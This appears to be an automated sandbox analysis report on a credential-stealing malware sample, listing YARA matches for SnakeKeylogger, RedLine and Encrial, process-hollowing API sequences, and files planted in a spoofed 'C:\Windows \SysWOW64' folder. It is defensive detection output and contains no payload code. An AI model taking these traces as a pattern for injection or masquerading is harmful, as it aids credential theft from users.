          Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000A.00000001.1837489352.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000006.00000002.2971941444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000F.00000001.1912204476.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000F.00000002.2971881656.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000006.00000001.1720780507.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000A.00000002.2971876015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D42A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_029D42A8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D33F8 NtWriteVirtualMemory,1_2_029D33F8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D30AC NtAllocateVirtualMemory,1_2_029D30AC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D96E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,1_2_029D96E4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D9600 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,1_2_029D9600
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,1_2_029D9578
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D3BBC NtUnmapViewOfSection,1_2_029D3BBC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D394C NtReadVirtualMemory,1_2_029D394C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D42A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_029D42A6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D30AA NtAllocateVirtualMemory,1_2_029D30AA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D9524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,1_2_029D9524
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_001540B1 NtQuerySystemInformation,8_2_001540B1
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_00155CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,8_2_00155CF1
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_00155911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxW,CreateActCtxW,GetModuleHandleW,CreateActCtxW,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,8_2_00155911
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_00154136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,8_2_00154136
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_00155D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,8_2_00155D6A
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A42A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,9_2_028A42A8
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A3BBC NtUnmapViewOfSection,9_2_028A3BBC
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A33F8 NtWriteVirtualMemory,9_2_028A33F8
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A30AC NtAllocateVirtualMemory,9_2_028A30AC
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A394C NtReadVirtualMemory,9_2_028A394C
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A96E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,9_2_028A96E4
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A42A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,9_2_028A42A6
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A30AA NtAllocateVirtualMemory,9_2_028A30AA
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A39E6 NtReadVirtualMemory,9_2_028A39E6
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A9600 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,9_2_028A9600
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A3493 NtWriteVirtualMemory,9_2_028A3493
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A3C48 NtUnmapViewOfSection,9_2_028A3C48
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A9524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_028A9524
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028A9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_028A9578
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029DAF34 InetIsOffline,Sleep,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,1_2_029DAF34
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\WindowsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \SysWOW64Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile deleted: C:\Windows \SysWOW64\svchost.pifJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C20B41_2_029C20B4
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00408C606_2_00408C60
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0040DC116_2_0040DC11
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00407C3F6_2_00407C3F
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00418CCC6_2_00418CCC
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00406CA06_2_00406CA0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004028B06_2_004028B0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0041A4BE6_2_0041A4BE
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00408C606_2_00408C60
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004182446_2_00418244
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004016506_2_00401650
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00402F206_2_00402F20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004193C46_2_004193C4
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004187886_2_00418788
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00402F896_2_00402F89
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00402B906_2_00402B90
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004073A06_2_004073A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_1B49C0116_2_1B49C011
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_1B4932AC6_2_1B4932AC
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_1B4950006_2_1B495000
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_1CF715606_2_1CF71560
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_1CF7154F6_2_1CF7154F
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_1CF712C06_2_1CF712C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_1CF712B06_2_1CF712B0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008F0C86_2_2008F0C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_200841EA6_2_200841EA
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008B1EE6_2_2008B1EE
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008D4906_2_2008D490
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008B4C06_2_2008B4C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008B7A06_2_2008B7A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_200858606_2_20085860
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008AA586_2_2008AA58
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008BA806_2_2008BA80
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008BD616_2_2008BD61
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_20085E586_2_20085E58
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008AF006_2_2008AF00
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_20088F186_2_20088F18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_200830686_2_20083068
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008D4806_2_2008D480
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008E5D96_2_2008E5D9
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008E5E86_2_2008E5E8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2008AC206_2_2008AC20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211435106_2_21143510
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211485686_2_21148568
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114B5986_2_2114B598
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211478206_2_21147820
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211400406_2_21140040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211407406_2_21140740
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21140E406_2_21140E40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211435016_2_21143501
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114E1086_2_2114E108
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114E5516_2_2114E551
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211485586_2_21148558
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114E5606_2_2114E560
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114B58A6_2_2114B58A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114E9B86_2_2114E9B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114E9A86_2_2114E9A8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114B9F06_2_2114B9F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114B9E66_2_2114B9E6
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211400066_2_21140006
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114D4006_2_2114D400
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114D8586_2_2114D858
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114D84A6_2_2114D84A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211470786_2_21147078
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211470886_2_21147088
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114DCB06_2_2114DCB0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114DCA06_2_2114DCA0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114E0F96_2_2114E0F9
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114FB186_2_2114FB18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114FB096_2_2114FB09
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211407326_2_21140732
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114CB506_2_2114CB50
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114CB406_2_2114CB40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114CF986_2_2114CF98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21146BB66_2_21146BB6
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114CFA86_2_2114CFA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114D3F06_2_2114D3F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114EE106_2_2114EE10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114EE006_2_2114EE00
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21140E316_2_21140E31
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114F25A6_2_2114F25A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21147A406_2_21147A40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114BE426_2_2114BE42
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114BE486_2_2114BE48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114F2686_2_2114F268
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114C2966_2_2114C296
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114F6B06_2_2114F6B0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114C2A06_2_2114C2A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114F6C06_2_2114F6C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114C6F86_2_2114C6F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2114C6EA6_2_2114C6EA
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115B9A86_2_2115B9A8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211565C06_2_211565C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21156C186_2_21156C18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21157AF06_2_21157AF0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21155D106_2_21155D10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21156B106_2_21156B10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211539186_2_21153918
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115B5186_2_2115B518
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211523006_2_21152300
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21155D006_2_21155D00
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115B5096_2_2115B509
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115D5086_2_2115D508
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211539086_2_21153908
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115E7396_2_2115E739
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21150D386_2_21150D38
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_211561586_2_21156158
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115C7586_2_2115C758
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115A7586_2_2115A758
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21150D486_2_21150D48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115E7486_2_2115E748
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_2115C7486_2_2115C748
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21153D706_2_21153D70
